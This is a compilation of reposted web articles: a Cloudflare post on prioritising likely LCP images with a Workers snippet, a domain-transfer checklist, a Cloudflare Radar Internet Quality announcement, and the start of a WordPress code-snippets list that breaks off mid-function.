In this co-authored blog with Google’s Patrick Meenan we will explain where the opportunities exist to improve website performance, how to check if a specific site can improve performance, and provide a small JavaScript snippet which can be used with Cloudflare Workers to do this optimization for you.

What happens when a browser receives the response?

Before we dive into where the opportunities are to improve website performance, let’s take a step back to understand how browsers load website assets by default.

After the browser sends an HTTP request to a server, it receives an HTTP response containing information like status codes, headers, and the requested content. The browser carefully analyzes the response’s status code and headers to ensure proper handling of the content.

Next, the browser processes the content itself. For HTML responses, the browser extracts important information from the <head> section of the HTML, such as the page title, stylesheets, and scripts. Once this information is parsed, the browser moves on to the response <body> which has the actual page content. During this stage, the browser begins to present the webpage to the visitor.

If the response references additional resources like CSS, JavaScript, or other content, the browser may need to fetch and integrate them into the webpage. Typically, browsers like Google Chrome delay loading images until the resources in the HTML <head> have loaded, which is also known as “blocking” the render of the webpage. However, developers can override this behavior using fetch priority or other methods to boost a resource’s priority in the browser. By adjusting an important image’s fetch priority (for example, <img src="hero.jpg" fetchpriority="high">), it can be loaded earlier, which can lead to significant improvements in crucial performance metrics like LCP (Largest Contentful Paint).

Images are so central to web pages that they have become an essential element in measuring website performance from Core Web Vitals. LCP measures the time it takes for the largest visible element, often an image, to be fully rendered on the screen. Optimizing the loading of critical images (like LCP images) can greatly enhance performance, improving the overall user experience and page performance.

But here’s the challenge: a browser may not know which images are most important for the visitor experience (like the LCP image) until rendering begins. If the developer can identify the LCP image or other critical elements before the page reaches the browser, their priority can be increased at the server to boost website performance instead of waiting for the browser to discover them naturally.

In our Smart Hints blog, we describe how Cloudflare will soon be able to automatically prioritize content on behalf of website developers, but what happens if there’s a need to optimize the priority of the images right now? How do you know if a website is in a suboptimal state and what can you do to improve?

Using Cloudflare, developers should be able to improve image performance with heuristics that identify likely-important images before the browser parses them so these images can have increased priority and be loaded sooner.

Identifying Image Priority opportunities

Just increasing the fetch priority of all images won’t help if they are lazy-loaded or are not critical/LCP images. Lazy-loading is a method developers use to improve the initial load of a webpage that includes numerous out-of-view elements. For example, on Instagram, as you continually scroll down to see more images, it only makes sense to load each image when the user reaches it; otherwise the page load would be needlessly delayed by the browser eagerly loading out-of-view images. Instead, the highest priority should be given to the LCP image in the viewport to improve performance.

So developers are left in a situation where they need to know which images are on users’ screens/viewports to increase their priority and which are off their screens to lazy-load them.

Recently, we’ve seen attempts to influence image priority on behalf of developers. For example, starting in WordPress 5.5, all images with an IMG tag and defined aspect ratios were lazy-loaded by default. While there are plugins and other methods WordPress developers can use to boost the priority of LCP images, lazy-loading all images by default without knowing which are LCP images can introduce artificial delays in website performance (they’re working on this though, and have partially resolved it for block themes).

So how do we identify the LCP image and other critical assets before they get to the browser?

To evaluate the opportunity to improve image performance, we turned to the HTTP Archive. Out of the approximately 22 million desktop pages tested in February 2023, 46% had an LCP element with an IMG tag, meaning that for about half of page loads the LCP element was an image. Among these desktop pages, 8.5 million had the image in the static HTML delivered with the page, indicating a total potential improvement opportunity of approximately 39% of the desktop pages in the dataset.

In the case of mobile pages, out of the ~28.5 million tested, 40% had an LCP element as an IMG tag. Among these mobile pages, 10.3 million had the image in the static HTML delivered with the page, suggesting a potential improvement opportunity in around 36% of the mobile pages within the dataset.

However, as previously discussed, prioritizing an image won’t be effective if the image is lazy-loaded, because the directives are contradictory. In the dataset, approximately 1.8 million LCP desktop images and 2.4 million LCP mobile images were lazy-loaded.

Therefore, across the Internet, the opportunity to improve image performance covers roughly 30% of pages that have an LCP image in the original HTML markup that wasn’t lazy-loaded; with a more advanced Cloudflare Worker, the additional 9% of lazy-loaded LCP images can also be improved by removing the lazy-load attribute.

If you’d like to determine which element on your website serves as the LCP element so you can increase the priority or remove any lazy-loading, you can use browser developer tools, or speed tests like Webpagetest or Cloudflare Observatory.

39% of desktop pages seems like a lot of opportunity to improve image performance. So the next question is: how can Cloudflare determine the LCP image across our network and automatically prioritize it?

Image Index

We thought that how soon the LCP image showed up in the HTML would serve as a useful indicator. So we analyzed the HTTP Archive dataset to see where the cumulative percentage of LCP images are discovered based on their position in the HTML, including lazy-loaded images.

We found that approximately 25% of the pages had the LCP image as the first image in the HTML (around 10% of all pages). Another 25% had the LCP image as the second image. WordPress seemed to arrive at a similar conclusion and recently released a development to remove the default lazy-load attribute from the first image on block themes, but there are opportunities to go further.

Our analysis revealed that implementing a straightforward rule like “do not lazy-load the first four images,” either through the browser, a content management system (CMS), or a Cloudflare Worker could address approximately 75% of the issue of lazy-loading LCP images (example Worker below).

Ignoring small images

In trying to find other ways to identify likely LCP images, we next turned to the size of the image. To increase the likelihood of catching the LCP image early in the HTML, we looked into ignoring “small” images, as they are unlikely to be big enough to be an LCP element. We explored several sizes, and 10,000 pixels (less than 100×100) proved a pretty reliable threshold that didn’t skip many LCP images and filtered out a good chunk of the non-LCP images.

By ignoring small images (<10,000px), we found that the first image became the LCP image in approximately 30-34% of cases. Adding the second image increased this percentage to 56-60% of pages.

Therefore, to improve image priority, a potential approach could involve assigning a higher priority to the first four “not-small” images.

Chrome 114 Image Prioritization Experiment

An experiment running in Chrome 114 does exactly what we described above. Within the browser there are a few different prioritization knobs to play with that aren’t web-exposed, so we have the opportunity to assign a “medium” priority to images that we want to boost automatically (directly controlling priority with “fetch priority” lets you set only high or low). This lets us move those images ahead of other images, async scripts, and parser-blocking scripts late in the body, while still keeping the boosted image priority below any high-priority requests, particularly dynamically-injected blocking scripts.

We are experimenting with boosting the priority of varying numbers of images (2, 5, and 10) and with allowing one of those medium-priority images to load at a time during Chrome’s “tight” mode (when it is loading the render-blocking resources in the head) to increase the likelihood that the LCP image will be available when the first paint is done.

The data is still coming in and no “ship” decisions have been made yet, but the early results are very promising, improving the LCP time across the entire web for all arms of the experiment (not by massive amounts, but moving the metrics of the whole web is notoriously difficult).

How to use Cloudflare Workers to boost performance

Now that we’ve seen that there is a large opportunity across the Internet to prioritize images for performance, and how to identify likely LCP images on individual pages, the question becomes: what would the results be of a network-wide rule that boosts image priority along these lines?

We built a test worker and deployed it on some WordPress test sites with our friends at Rocket.net, a WordPress hosting platform focused on performance. This worker boosts the priority of the first four images while removing the lazy-load attribute, if present. When deployed we saw good performance results and the expected image prioritization.

export default {
  async fetch(request) {
    const response = await fetch(request);

    // Only rewrite HTML responses; pass everything else through untouched
    const contentType = response.headers.get('Content-Type');
    if (!contentType || !contentType.includes('text/html')) {
      return response;
    }

    return transformResponse(response);
  },
};

function transformResponse(response) {
  // Define the image transformation logic with HTMLRewriter. Returning
  // the transformed response directly keeps the body streaming instead
  // of buffering the whole document in memory.
  const rewriter = new HTMLRewriter()
    .on('img', new ImageElementHandler());

  return rewriter.transform(response);
}
 
class ImageElementHandler {
  constructor() {
    this.imageCount = 0;
    this.processedImages = new Set();
  }
 
  element(element) {
    const imgSrc = element.getAttribute('src');

    // Boost only the first four distinct images that clear the
    // 10,000-pixel "small image" threshold described above
    if (imgSrc && this.imageCount < 4 && !this.processedImages.has(imgSrc) && !isImageSmall(element)) {
      element.removeAttribute('loading');            // undo lazy-loading, if present
      element.setAttribute('fetchpriority', 'high'); // ask the browser to fetch early
      this.processedImages.add(imgSrc);
      this.imageCount++;
    }
  }
}
 
function isImageSmall(element) {
  // Check if the element has width and height attributes
  const width = element.getAttribute('width');
  const height = element.getAttribute('height');
 
  // If width or height is 0, or width * height < 10000, consider the image as small
  if ((width && parseInt(width, 10) === 0) || (height && parseInt(height, 10) === 0)) {
    return true;
  }
 
  if (width && height) {
    const area = parseInt(width, 10) * parseInt(height, 10);
    if (area < 10000) {
      return true;
    }
  }
 
  return false;
}

When testing the Worker, we saw that the default image priority was boosted to “high” for the first four images, while the fifth image remained “low.” This resulted in an LCP rating of “good” in a speed test. While this initial test is not a dispositive indicator that the Worker will boost performance in every situation, the results are promising and we look forward to continuing to experiment with this idea.

While we’ve experimented with WordPress sites to illustrate the issues and potential performance benefits, this issue is present across the Internet.

Website owners can help us experiment with the Worker above to improve the priority of images on their websites or edit it to be more specific by targeting likely LCP elements. Cloudflare will continue experimenting using a very similar process to understand how to safely implement a network-wide rule to ensure that images are correctly prioritized across the Internet and performance is boosted without the need to configure a specific Worker.

Automatic Platform Optimization

Cloudflare’s Automatic Platform Optimization (APO) is a plugin for WordPress which allows Cloudflare to deliver your entire WordPress site from our network ensuring consistent, fast performance for visitors. By serving cached sites, APO can improve performance metrics. APO does not currently have a way to prioritize images over other assets to improve browser render metrics or dynamically rewrite HTML, techniques we’ve discussed in this post. Although this presents a potential opportunity for future development, it requires thorough testing to ensure safe and reliable support.

In the future we’ll look to include the techniques discussed today as part of APO; in the meantime, we recommend using Snippets (and Experiments) to test the code example above and see the performance impact on your website.

Get in touch!

If you are interested in using the JavaScript above, we recommend testing with Workers or using Cloudflare Snippets. We’d love to hear about your results; get in touch via social media and share your experiences.


Source :
https://blog.cloudflare.com/speeding-up-your-website-in-a-few-clicks/

A step-by-step guide to transferring domains to Cloudflare

23/06/2023

Transferring your domains to a new registrar isn’t something you do every day, and getting any step of the process wrong could mean downtime and disruption. That’s why this Speed Week we’ve prepared a domain transfer checklist. We want to empower anyone to quickly transfer their domains to Cloudflare Registrar, without worrying about missing any steps along the way or being left with any unanswered questions.

Domain Transfer Checklist

Confirm eligibility

  • Confirm you want to use Cloudflare’s nameservers: We built our registrar specifically for customers who want to use other Cloudflare products. This means domains registered with Cloudflare can only use our nameservers. If your domain requires non-Cloudflare nameservers then we’re not the right registrar for you.
  • Confirm Cloudflare supports your domain’s TLD: You can view the full list of TLDs we currently support here. Note: We plan to support .dev and .app by mid-July 2023.
  • Confirm your domain is not a premium domain or an internationalized domain name (IDN): Cloudflare currently does not support premium domains or internationalized domain names (Unicode).
  • Confirm your domain hasn’t been registered or transferred in the past 60 days: ICANN rules prohibit a domain from being transferred if it has been registered or previously transferred within the last 60 days.
  • Confirm your WHOIS Registrant contact information hasn’t been updated in the past 60 days: ICANN rules also prohibit a domain from being transferred if the WHOIS Registrant contact information was modified in the past 60 days.

Before you transfer

  • Gather your credentials for your current registrar: Make sure you have your credentials for your current registrar. It’s possible you haven’t logged in for many years and you may have to reset your password.
  • Make note of your current DNS settings: When transferring your domain, Cloudflare will automatically scan your DNS records, but you’ll want to capture your current settings in case there are any issues. If your current provider supports it, you could use the standard BIND zone file format to export your records.
  • Remove WHOIS privacy (if necessary): In most cases, domains may be transferred even if WHOIS privacy services have been enabled. However, some registrars may prohibit the transfer if the WHOIS privacy service has been enabled.
  • Disable DNSSEC: You can disable DNSSEC by removing the DS record at your current DNS host and disabling DNSSEC in the Cloudflare dashboard.
  • Renew your domain if up for renewal in the next 15 days: If your domain is up for renewal, you’ll need to renew it with your current registrar before initiating a transfer to Cloudflare.
  • Unlock the domain: Registrars include a lightweight safeguard to prevent unauthorized users from starting domain transfers – often called a registrar or domain lock. This lock prevents any other registrar from attempting to initiate a transfer. Only the registrant can enable or disable this lock, typically through the administration interface of the registrar.
  • Sign up for Cloudflare: If you don’t already have a Cloudflare account, you can sign up here.
  • Add your domain to Cloudflare: You can add a new domain to your Cloudflare account by following these instructions.
  • Add a valid credit card to your Cloudflare account: If you haven’t already added a payment method to your Cloudflare dashboard billing profile, you’ll be prompted to add one when you add your domain.
  • Review DNS records at Cloudflare: Once you’ve added your domain, compare the DNS records that Cloudflare automatically configured against what you have at your current registrar to make sure nothing was missed.
  • Change your DNS nameservers to Cloudflare: In order to transfer your domain, your nameservers will need to be set to Cloudflare.
  • (optional) Configure Cloudflare Email Routing: If you’re using email forwarding, ensure that you follow this guide to migrate to Cloudflare Email Routing.
  • Wait for your DNS changes to propagate: Registrars can take up to 24 hours to process nameserver updates. You will receive an email when Cloudflare has confirmed that these changes are in place, and you can also check for yourself (see the snippet after this list). You can’t proceed with transferring your domain until this process is complete.
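
For the propagation check mentioned in the last step, one option is to query Cloudflare’s public DNS-over-HTTPS JSON API for your domain’s NS records. A sketch for Node 18+ run as an ES module; example.com is a placeholder:

// Ask 1.1.1.1's DNS-over-HTTPS endpoint which nameservers are live.
const domain = 'example.com'; // placeholder: your domain

const res = await fetch(
  `https://cloudflare-dns.com/dns-query?name=${domain}&type=NS`,
  { headers: { accept: 'application/dns-json' } }
);
const { Answer = [] } = await res.json();

// Once the change has propagated, these should be *.ns.cloudflare.com.
for (const record of Answer) {
  console.log(record.data);
}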

Initiating and confirming transfer process

  • Request an authorization code: Cloudflare needs to confirm with your old registrar that the transfer flow is authorized. To do that, your old registrar will provide an authorization code to you. This code is often referred to as an authorization code, auth code, authinfo code, or transfer code. You will need to input that code to complete your transfer to Cloudflare. We will use it to confirm the transfer is authentic.
  • Initiate your transfer to Cloudflare: Visit the Transfer Domains section of your Cloudflare dashboard. Here you’ll be presented with any domains available for transfer. If your domain isn’t showing, ensure you completed all the preceding steps. If you have, review the list on this page to see if any apply to your domain.
  • Review the transfer price: When you transfer a domain, you are required by ICANN to pay to extend its registration by one year from the expiration date. You will not be billed at this step. Cloudflare will only bill your card when you input the auth code and confirm the contact information at the conclusion of your transfer request.
  • Input your authorization code: On the next page, input the authorization code for each domain you are transferring.
  • Confirm or input your contact information: In the final stage of the transfer process, input the contact information for your registration. Cloudflare Registrar redacts this information by default but is required to collect the authentic contact information for this registration.
  • Approve the transfer with Cloudflare: Once you have requested your transfer, Cloudflare will begin processing it, and send a Form of Authorization (FOA) email to the registrant, if the information is available in the public WHOIS database. The FOA is what authorizes the domain transfer.
  • Approve the transfer with your previous registrar: After this step, your previous registrar will also email you to confirm your request to transfer. Most registrars will include a link to confirm the transfer request. If you follow that link, you can accelerate the transfer operation. If you do not act on the email, the registrar can wait up to five days to process the transfer to Cloudflare. You may also be able to approve the transfer from within your current registrar dashboard.
  • Follow your transfer status in your Cloudflare dashboard: Your domain transfer status will be viewable under Account Home > Overview > Domain Registration for your domain.

After you transfer


Source :
https://blog.cloudflare.com/a-step-by-step-guide-to-transferring-domains-to-cloudflare/

Introducing the Cloudflare Radar Internet Quality Page

23/06/2023

Internet connections are most often marketed and sold on the basis of “speed”, with providers touting the number of megabits or gigabits per second that their various service tiers are supposed to provide. This marketing has largely been successful, as most subscribers believe that “more is better”. Furthermore, many national broadband plans in countries around the world include specific target connection speeds. However, even with a high speed connection, gamers may encounter sluggish performance, while video conference participants may experience frozen video or audio dropouts. Speeds alone don’t tell the whole story when it comes to Internet connection quality.

Additional factors like latency, jitter, and packet loss can significantly impact end user experience, potentially leading to situations where higher speed connections actually deliver a worse user experience than lower speed connections. Connection performance and quality can also vary based on usage – measured average speed will differ from peak available capacity, and latency varies under loaded and idle conditions.

The new Cloudflare Radar Internet Quality page

A little more than three years ago, as residential Internet connections were strained because of the shift towards working and learning from home due to the COVID-19 pandemic, Cloudflare announced the speed.cloudflare.com speed test tool, which enabled users to test the performance and quality of their Internet connection. Within the tool, users can download the results of their individual test as a CSV, or share the results on social media. However, there was no aggregated insight into Cloudflare speed test results at a network or country level to provide a perspective on connectivity characteristics across a larger population.

Today, we are launching these long-missing aggregated connection performance and quality insights on Cloudflare Radar. The new Internet Quality page provides both country and network (autonomous system) level insight into Internet connection performance (bandwidth) and quality (latency and jitter) over time. (Your Internet service provider is likely an autonomous system with its own autonomous system number (ASN), and many large companies, online platforms, and educational institutions also have their own autonomous systems and associated ASNs.) The insights we are providing are presented across two sections: the Internet Quality Index (IQI), which estimates average Internet quality based on aggregated measurements against a set of Cloudflare & third-party targets, and Connection Quality, which presents peak/best case connection characteristics based on speed.cloudflare.com test results aggregated over the previous 90 days. (Details on our approach to the analysis of this data are presented below.)

Users may note that individual speed test results, as well as the aggregate speed test results presented on the Internet Quality page will likely differ from those presented by other speed test tools. This can be due to a number of factors including differences in test endpoint locations (considering both geographic and network distance), test content selection, the impact of “rate boosting” by some ISPs, and testing over a single connection vs. multiple parallel connections. Infrequent testing (on any speed test tool) by users seeking to confirm perceived poor performance or validate purchased speeds will also contribute to the differences seen in the results published by the various speed test platforms.

And as we announced in April, Cloudflare has partnered with Measurement Lab (M-Lab) to create a publicly-available, queryable repository for speed test results. M-Lab is a non-profit third-party organization dedicated to providing a representative picture of Internet quality around the world. M-Lab produces and hosts the Network Diagnostic Tool, which is a very popular network quality test that records millions of samples a day. Given their mission to provide a publicly viewable, representative picture of Internet quality, we chose to partner with them to provide an accurate view of your Internet experience and the experience of others around the world using openly available data.

Connection speed & quality data is important

While most advertisements for fixed broadband and mobile connectivity tend to focus on download speeds (and peak speeds at that), there’s more to an Internet connection, and the user’s experience with that Internet connection, than that single metric. In addition to download speeds, users should also understand the upload speeds that their connection is capable of, as well as the quality of the connection, as expressed through metrics known as latency and jitter. Getting insight into all of these metrics provides a more well-rounded view of a given Internet connection, or in aggregate, the state of Internet connectivity across a geography or network.

The concept of download speeds is fairly well understood as a measure of performance. However, it is important to note that the average download speeds experienced by a user during common Web browsing activities, which often involve the parallel retrieval of multiple smaller files from multiple hosts, can differ significantly from peak download speeds, where the user is downloading a single large file (such as a video or software update), which allows the connection to reach maximum performance. The bandwidth (speed) available for upload is sometimes mentioned in ISP advertisements, but doesn’t receive much attention. (And depending on the type of Internet connection, there’s often a significant difference between the available upload and download speeds.) However, the importance of upload came to the forefront in 2020 as video conferencing tools saw a surge in usage as both work meetings and school classes shifted to the Internet during the COVID-19 pandemic. To share your audio and video with other participants, you need sufficient upload bandwidth, and this issue was often compounded by multiple people sharing a single residential Internet connection.

Latency is the time it takes data to move through the Internet, and is measured in the number of milliseconds that it takes a packet of data to go from a client (such as your computer or mobile device) to a server, and then back to the client. In contrast to speed metrics, lower latency is preferable. This is especially true for use cases like online gaming where latency can make a difference between a character’s life and death in the game, as well as video conferencing, where higher latency can cause choppy audio and video experiences, but it also impacts web page performance. The latency metric can be further broken down into loaded and idle latency. The former measures latency on a loaded connection, where bandwidth is actively being consumed, while the latter measures latency on an “idle” connection, when there is no other network traffic present. (These specific loaded and idle definitions are from the device’s perspective, and more specifically, from the speed test application’s perspective. Unless the speed test is being performed directly from a router, the device/application doesn’t have insight into traffic on the rest of the network.) Jitter is the average variation found in consecutive latency measurements, and can be measured on both idle and loaded connections. A lower number means that the latency measurements are more consistent. As with latency, Internet connections should have minimal jitter, which helps provide more consistent performance.

Our approach to data analysis

The Internet Quality Index (IQI) and Connection Quality sections get their data from two different sources, providing two different (albeit related) perspectives. Under the hood they share some common principles, though.

IQI builds upon the mechanism we already use to regularly benchmark ourselves against other industry players. It is based on end user measurements against a set of Cloudflare and third-party targets, meant to represent a pattern that has become very common in the modern Internet, where most content is served from distribution networks with points of presence spread throughout the world. For this reason, and by design, IQI will show worse results for regions and Internet providers that rely on international (rather than peering) links for most content.

IQI is also designed to reflect the traffic load most commonly associated with web browsing, rather than more intensive use. This, and the chosen set of measurement targets, effectively biases the numbers towards what end users experience in practice (where latency plays an important role in how fast things can go).

For each metric covered by IQI, and for each ASN, we calculate the 25th percentile, median, and 75th percentile at 15 minute intervals. At the country level and above, the three calculated numbers for each ASN visible from that region are independently aggregated. This aggregation takes the estimated user population of each ASN into account, biasing the numbers away from networks that source a lot of automated traffic but have few end users.

The Connection Quality section gets its data from the Cloudflare Speed Test tool, which exercises a user’s connection in order to see how well it is able to perform. It measures against the closest Cloudflare location, providing a good balance of realistic results and network proximity to the end user. We have a presence in 285 cities around the world, allowing us to be pretty close to most users.

Similar to the IQI, we calculate the 25th percentile, median, and 75th percentile for each ASN. But here these three numbers are immediately combined using an operation called the trimean: a single number meant to balance the best connection quality that most users have with the best quality available from that ASN (users may not subscribe to the best available plan for a number of reasons).
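
For reference, Tukey’s trimean weights the median twice: trimean = (p25 + 2 × median + p75) / 4. Below is a minimal sketch of this aggregation step, our illustration of the published formula rather than Cloudflare’s pipeline code:

// Tukey's trimean: one number balancing typical quality (the median)
// against the spread of what the network delivers (p25 and p75).
function percentile(sorted, p) {
  const idx = Math.min(sorted.length - 1, Math.floor(p * sorted.length));
  return sorted[idx];
}

function trimean(samples) {
  const sorted = [...samples].sort((a, b) => a - b);
  return (
    (percentile(sorted, 0.25) +
      2 * percentile(sorted, 0.5) +
      percentile(sorted, 0.75)) / 4
  );
}

// Example: download speeds (Mbps) from speed tests on one ASN.
console.log(trimean([12, 35, 48, 250, 300, 310, 900]));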

Because users may choose to run a speed test for different motives at different times, and also because we take privacy very seriously and don’t record any personally identifiable information along with test results, we aggregate at 90-day intervals to capture as much variability as we can.

At the country level and above, the calculated trimean for each ASN in that region is aggregated. This, again, takes the estimated user population of each ASN into account, biasing the numbers away from networks that have few end users but which may still have technicians using the Cloudflare Speed Test to assess the performance of their network.

The new Internet Quality page includes three views: Global, country-level, and autonomous system (AS). In line with the other pages on Cloudflare Radar, the country-level and AS pages show the same data sets, differing only in their level of aggregation. Below, we highlight the various components of the Internet Quality page.

Global

The top section of the global (worldwide) view includes time series graphs of the Internet Quality Index metrics aggregated at a continent level. The time frame shown in the graphs is governed by the selection made in the time frame drop down at the upper right of the page, and at launch, data for only the last three months is available. For users interested in examining a specific continent, clicking on the other continent names in the legend removes them from the graph. Although continent-level aggregation is still rather coarse, it still provides some insight into regional Internet quality around the world.

Further down the page, the Connection Quality section presents a choropleth map, with countries shaded according to the values of the speed, latency, or jitter metric selected from the drop-down menu. Hovering over a country displays a label with the country’s name and metric value, and clicking on the country takes you to the country’s Internet Quality page. Note that in contrast to the IQI section, the Connection Quality section always displays data aggregated over the previous 90 days.

Country-level

Within the country-level page (using Canada as an example in the figures below), the country’s IQI metrics over the selected time frame are displayed. These time series graphs show the median bandwidth, latency, and DNS response time within a shaded band bounded at the 25th and 75th percentile and represent the average expected user experience across the country, as discussed in the Our approach to data analysis section above.

Below that is the Connection Quality section, which provides a summary view of the country’s measured upload and download speeds, as well as latency and jitter, over the previous 90 days. The colored wedges in the Performance Summary graph are intended to illustrate aggregate connection quality at a glance, with an “ideal” connection having larger upload and download wedges and smaller latency and jitter wedges. Hovering over the wedges displays the metric’s value, which is also shown in the table to the right of the graph.

Below that, the Bandwidth and Latency/Jitter histograms illustrate the bucketed distribution of upload and download speeds, and latency and jitter measurements. In some cases, the speed histograms may show a noticeable bar at 1 Gbps, or 1000 ms (1 second) on the latency/jitter histograms. The presence of such a bar indicates that there is a set of measurements with values greater than the 1 Gbps/1000 ms maximum histogram values.

Autonomous system level

Within the upper-right section of the country-level page, a list of the top five autonomous systems within the country is shown. Clicking on an ASN takes you to the Performance page for that autonomous system. For others not displayed in the top five list, you can use the search bar at the top of the page to search by autonomous system name or number. The graphs shown within the AS level view are identical to those shown at a country level, but obviously at a different level of aggregation. You can find the ASN that you are connected to from the My Connection page on Cloudflare Radar.

Exploring connection performance & quality data

Digging into the IQI and Connection Quality visualizations can surface some interesting observations, including characterizing Internet connections, and the impact of Internet disruptions, including shutdowns and network issues. We explore some examples below.

Characterizing Internet connections

Verizon FiOS is a residential fiber-based Internet service available to customers in the United States. Fiber-based Internet services (as opposed to cable-based, DSL, dial-up, or satellite) will generally offer symmetric upload and download speeds, and the FiOS plans page shows this to be the case, offering 300 Mbps (upload & download), 500 Mbps (upload & download), and “1 Gig” (Verizon claims average wired speeds between 750-940 Mbps download / 750-880 Mbps upload) plans. Verizon carries FiOS traffic on AS701 (labeled UUNET due to a historical acquisition), and in looking at the bandwidth histogram for AS701, several things stand out. The first is a rough symmetry in upload and download speeds. (A cable-based Internet service provider, in contrast, would generally show a wide spread of download speeds, but have upload speeds clustered at the lower end of the range.) Another is the peaks around 300 Mbps and 750 Mbps, suggesting that the 300 Mbps and “1 Gig” plans may be more popular than the 500 Mbps plan. It is also clear that there are a significant number of test results with speeds below 300 Mbps. This is due to several factors: one is that Verizon also carries lower-speed non-FiOS traffic on AS701, while another is that the erratic nature of in-home WiFi often means that the speeds achieved in a test will be lower than the purchased service level.

Traffic shifts drive latency shifts

On May 9, 2023, the government of Pakistan ordered the shutdown of mobile network services in the wake of protests following the arrest of former Prime Minister Imran Khan. Our blog post covering this shutdown looked at the impact from a traffic perspective. Within the post, we noted that autonomous systems associated with fixed broadband networks saw significant increases in traffic when the mobile networks were shut down – that is, some users shifted to using fixed networks (home broadband) when mobile networks were unavailable.

Examining IQI data after the blog post was published, we found that the impact of this traffic shift was also visible in our latency data. As can be seen in the shaded area of the graph below, the shutdown of the mobile networks resulted in the median latency dropping about 25% as usage shifted from higher latency mobile networks to lower latency fixed broadband networks. An increase in latency is visible in the graph when mobile connectivity was restored on May 12.

Bandwidth shifts as a potential early warning sign

On April 4, UK mobile operator Virgin Media suffered several brief outages. The IQI bandwidth graph for AS5089, the ASN used by Virgin Media (formerly branded as NTL), shows indications of a potential problem several days before the outages occurred, as median bandwidth dropped by about a third, from around 35 Mbps to around 23 Mbps. The outages are visible in the circled area in the graph below. Published reports indicate that the problems lasted into April 5, in line with the lower median bandwidth measured through mid-day.

Submarine cable issues cause slower browsing

On June 5, Philippine Internet provider PLDT Tweeted an advisory that noted “One of our submarine cable partners confirms a loss in some of its internet bandwidth capacity, and thus causing slower Internet browsing.” IQI latency and bandwidth graphs for AS9299, a primary ASN used by PLDT, shows clear shifts starting around 06:45 UTC (14:45 local time). Median bandwidth dropped by half, from 17 Mbps to 8 Mbps, while median latency increased by 75% from 37 ms to around 65 ms. 75th percentile latency also saw a significant increase, nearly tripling from 63 ms to 180 ms coincident with the reported submarine cable issue.

Conclusion

Making network performance and quality insights available on Cloudflare Radar supports Cloudflare’s mission to help build a better Internet. However, we’re not done yet – we have more enhancements planned. These include making data available at a more granular geographical level (such as state and possibly city), incorporating AIM scores to help assess Internet quality for specific types of use cases, and embedding the Cloudflare speed test directly on Radar using the open source JavaScript module.

In the meantime, we invite you to use speed.cloudflare.com to test the performance and quality of your Internet connection, share any country or AS-level insights you discover on social media (tag @CloudflareRadar on Twitter or @radar@cloudflare.social on Mastodon), and explore the underlying data through the M-Lab repository or the Radar API.

Watch on Cloudflare TV

https://customer-rhnwzxvb3mg4wz3v.cloudflarestream.com/debcbed2114d086c870059ac604eca49/iframe?preload=true&poster=https%3A%2F%2Fcustomer-rhnwzxvb3mg4wz3v.cloudflarestream.com%2Fdebcbed2114d086c870059ac604eca49%2Fthumbnails%2Fthumbnail.jpg%3Ftime%3D1s%26height%3D600


Source :
https://blog.cloudflare.com/introducing-radar-internet-quality-page/

10 Useful Code Snippets for WordPress Users

LAST UPDATED: APRIL 26, 2023

We know that plugins can be used to extend the functionality of WordPress. But what if you could do some of the smaller things in WordPress without installing a plugin? Say you dislike the admin bar at the top and wish to remove it? Yes, that can be accomplished by means of code snippets for WordPress.

Basically, code snippets for WordPress are used to perform certain actions that might otherwise require a dedicated smaller plugin. Such code snippets are placed in your theme files (generally the functions.php file of your theme).


In this article, we will share ten very useful code snippets for WordPress users. We’ll then wrap up by explaining how you can add these code snippets to your WordPress pages and posts using a free plugin.

10 Useful Code Snippets for WordPress Users 📚

  1. Allow Contributors to Upload Images
  2. Show Popular Posts Without Plugins
  3. Disable Search in WordPress
  4. Protect Your Site from Malicious Requests
  5. Paginate Your Site Without Plugins
  6. Disable the Admin Bar
  7. Show Post Thumbnails in RSS Feed
  8. Change the Author Permalink Structure
  9. Automatically Link to Twitter Usernames in Content
  10. Create a PayPal Donation Shortcode

Word of Caution! ✋

As you might have guessed, code snippets for WordPress, while really useful, tend to alter the default functionality, so there is a small margin of error with each snippet. Generally, such issues arise due to incompatible plugins and/or themes, and disappear once you remove the conflicting theme or plugin, or decide not to use the snippet in question.

However, to be on the safe side, be sure to take proper backups of your WordPress website before making any changes by means of snippets. Also, if you encounter any errors or performance issues, roll back your site and check for plugin or theme incompatibilities.

Now, on to the code snippets for WordPress users!

1. Allow Contributors to Upload Images

By default, WordPress does not permit contributor accounts to upload images. You can, of course, promote that particular account to Author or Editor, which will give it the rights to upload and modify images. However, it will also grant additional rights, such as the ability to publish articles (as opposed to submitting them for review).

This particular code snippet allows contributor accounts to upload images to their articles, without granting them any additional privileges or rights. Paste it in the functions.php file of your theme:

// Grant the 'upload_files' capability to contributor accounts that lack it.
if ( current_user_can( 'contributor' ) && ! current_user_can( 'upload_files' ) ) {
    add_action( 'admin_init', 'allow_contributor_uploads' );
}

function allow_contributor_uploads() {
    // add_cap() writes the capability to the database, so this only needs to run once.
    $contributor = get_role( 'contributor' );
    $contributor->add_cap( 'upload_files' );
}

2. Show Popular Posts Without Plugins

This one is a little trickier. However, if you are not too keen on installing an extra plugin to showcase popular posts (say, you have limited server memory or disk space), this pair of snippets has you covered.

Paste the following in functions.php:

// Increment a view counter (stored in post meta) every time a single post loads.
function count_post_visits() {
    if ( is_single() ) {
        global $post;
        $views = get_post_meta( $post->ID, 'my_post_viewed', true );
        if ( $views == '' ) {
            update_post_meta( $post->ID, 'my_post_viewed', '1' );
        } else {
            $views_no = intval( $views );
            update_post_meta( $post->ID, 'my_post_viewed', ++$views_no );
        }
    }
}
add_action( 'wp_head', 'count_post_visits' );

Thereafter, paste the following in your template files wherever you wish to display the popular posts:

$popular_posts_args = array(
    'posts_per_page' => 3,
    'meta_key'       => 'my_post_viewed',
    'orderby'        => 'meta_value_num',
    'order'          => 'DESC',
);
$popular_posts_loop = new WP_Query( $popular_posts_args );
while ( $popular_posts_loop->have_posts() ) :
    $popular_posts_loop->the_post();
    // Output each post however your theme requires, for example:
    the_title( '<h3>', '</h3>' );
endwhile;
wp_reset_postdata(); // Restore the main query's post data (wp_reset_query() is for query_posts()).

3. Disable Search in WordPress

The search feature of WordPress has been around for a long time. However, if your website does not need it, or you do not want users to “search” through your website for some reason, you can use this code snippet.

Essentially, it is a custom function that nullifies the search feature. Not just the search bar in your sidebar or menu: the entire native WP search goes away. Why can this be useful? Again, it can help if you are running your website on a low-spec server and do not have content that needs to be searched (perhaps you are not running a blog).

Again, add this to the functions.php file:

function fb_filter_query( $query, $error = true ) {
    if ( is_search() ) {
        $query->is_search       = false;
        $query->query_vars['s'] = false;
        $query->query['s']      = false;
